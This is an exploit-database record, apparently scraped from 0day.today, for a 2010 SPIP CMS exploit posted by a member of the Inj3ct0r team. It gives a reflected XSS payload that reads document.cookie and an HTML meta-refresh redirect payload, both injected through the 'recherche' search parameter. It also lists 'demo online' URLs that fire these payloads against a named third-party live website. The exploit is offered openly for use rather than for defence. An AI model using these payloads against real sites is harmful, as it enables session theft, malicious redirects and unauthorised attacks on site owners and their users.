Description
Exploit for php platform in category web applications
{"id": "1337DAY-ID-11943", "type": "zdt", "bulletinFamily": "exploit", "title": "SPIP CMS (XSS/URL Redirecting) Multiple Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2010-04-23T00:00:00", "modified": "2010-04-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/11943", "reporter": "The_Exploited", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-09T11:42:51", "viewCount": 5, "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "sourceHref": "https://0day.today/exploit/11943", "sourceData": "=====================================================\r\nSPIP CMS (XSS/URL Redirecting) Multiple Vulnerability\r\n=====================================================\r\n\r\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : Inj3ct0r.com 0\r\n1 [+] Support e-mail : submit[at]inj3ct0r.com 1\r\n0 0\r\n1 ########################################### 1\r\n0 I'm The_Exploited member from Inj3ct0r Team 1\r\n1 ########################################### 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\n[+] Discovered By: The_Exploited\r\n\r\n@Title: SPIP CMS (XSS/URL Redirecting) Multiple Vulnerability\r\n\r\n@Author: The_Exploited aka l3d aka Spoof\r\n\r\n@Mail: [email\u00a0protected]\r\n\r\n@Site: http://site.securityspl0its.com/ - http://forum.securityspl0its.com/\r\n\r\n@Exploit (XSS): \"><script>alert(document.cookie)</script>\r\n\r\n@Demo (XSS): http://www.mysite.com/spip/index.php?recherche=[XSS]\r\n\r\n@Demo online: http://www.baleria.com/index.php?recherche=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&bbaler=Buscar&body=recherche\r\n\r\n@Exploit (URL Redirecting Vuln): <HTML> <HEAD> <TITLE>Redirect...</TITLE> <META HTTP-EQUIV=\"REFRESH\" CONTENT=\"0; URL=http://www.google.com\"> </HEAD> <BODY> Redirecting...By The_Exploited</BODY> </HTML>\r\n\r\n@Demo (URL Redirecting Vuln): http://www.mysite.com/spip/index.php?recherche=[REDIRECT]\r\n\r\n@Demo online (URL Redirecting Vuln): http://www.baleria.com/index.php?recherche=<HTML> <HEAD> <TITLE>Redirect...</TITLE> <META HTTP-EQUIV=\"REFRESH\" CONTENT=\"0; URL=http://www.google.com\"> </HEAD> <BODY> Redirecting...By The_Exploited</BODY> </HTML>&bbaler=Buscar&body=recherche\r\n\r\n@CMS Version: All\r\n\r\n@CMS Download: http://www.spip.net/\r\n\r\n\n\n# 0day.today [2018-04-09] #", "_state": {"dependencies": 1646918282, "score": 1659766679, "epss": 1678811959}}
{}